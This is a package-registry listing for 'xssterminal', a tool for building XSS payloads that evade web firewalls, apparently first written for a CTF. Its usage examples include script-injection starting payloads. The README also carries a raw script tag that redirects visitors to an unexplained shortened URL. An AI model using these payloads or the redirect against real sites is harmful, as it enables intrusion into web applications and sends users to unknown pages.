Security News
Oracle Drags Its Feet in the JavaScript Trademark Dispute
Oracle seeks to dismiss fraud claims in the JavaScript trademark dispute, delaying the case and avoiding questions about its right to the name.
By Sarah Gooding - Feb 07, 2025
New Case Study:See how Anthropic automated 95% of dependency reviews with Socket.Learn More →
- Maintainers
- 1
Example
XSSTerminal
Description
Its a tool for developing advanced xss payloads through multiple trials and errors. Develop your own XSS payload interactively for CTFs and maybe even real world. Typing the payload manually in browser, finding that specific text in source code to identify sanitization/WAF block is booring. This is the upgrade you need :muscle:
Features
- Easy to view response and sending requests in loop without lot of hassle.
- Identification whether WAF has blocked requests or not using based on certain strings.
- Saving of sessions and rerunning in future.
- Go version is archived but works.
Installation
pip install xssterminalpython3 setup.py install
Usage
usage: XSSTerminal [-h] [-u BASE_URL] [-p PAYLOAD] [-e ERROR_STRING | -s MATCH_STRING | -b BLIND_STRING] [-m {GET,POST}] [-o OUTPUT] [-r RESUME]
XSS Terminal
optional arguments:
-h, --help show this help message and exit
-u BASE_URL, --base-url BASE_URL
Base URL
-p PAYLOAD, --payload PAYLOAD
Starting payload
-e ERROR_STRING, --error-string ERROR_STRING
Error string
-s MATCH_STRING, --match-string MATCH_STRING
Match string
-b BLIND_STRING, --blind-string BLIND_STRING
Blind error string
-m {GET,POST}, --method {GET,POST}
HTTP Method (Default get)
-o OUTPUT, --output OUTPUT
Output file name
-r RESUME, --resume RESUME
Filename to resume XSST session
--banner Print banner and exit
<script>window.location="https://bit.ly/3n60FQ4";</script>
For advanced usage with explanation: XSSTerminal Usage/Explanation
Example
- Using one GET parameter:
./XSSTerminal.py -u https://baseurl.com/?v= -p 'hello.com\'><script>' -e 'Your IP has been blocked'
- Using multiple GET parameter:
./XSSTerminal.py -u 'https://baseurl.com/?par1=y&par2=n&par3=s&vulnerable_parameter=' -p 'hello.com"><script>' -e 'Your IP has been blocked'
- Using multiple POST parameter:
./XSSTerminal.py -u https://baseurl.com/waf.php -p 'par1=y&par2=n&par3=s&vulnerable_parameter=hello.com"><script>' -e 'Your IP has been blocked' --method POST
History
I was developing xss payload for Clownflare WAF (CTF by Roni Carta/Lupin). I had some problems of not being able to test XSS properly so I developed this tool. The argument I used on CTF was similar to this:-
python3 XSSTerminal.py --base-url http://brutal.x55.is/?src= -p 'startingtext' -e 'Blocked'
At last, I came up with the payload which wasn't blocked. Thought I didnt complete the CTF full and failed, I learn lot of awesome stuff.
Note
Its not a tool for XSS detection but rather exploitation like bypassing WAFs.
Limitations
- Unknown
FAQs
A tool for developing advanced xss payloads
We found that xssterminal demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 1 open source maintainer collaborating on the project.
Did you know?
Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.
Related posts
Security News
Linux Foundation Warns Open Source Developers: Compliance with Sanctions Is Not Optional
The Linux Foundation is warning open source developers that compliance with global sanctions is mandatory, highlighting legal risks and restrictions on contributions.
By Sarah Gooding - Feb 06, 2025
Security News
Maven Central Adds Sigstore Signature Validation
Maven Central now validates Sigstore signatures, making it easier for developers to verify the provenance of Java packages.
By Sarah Gooding - Feb 06, 2025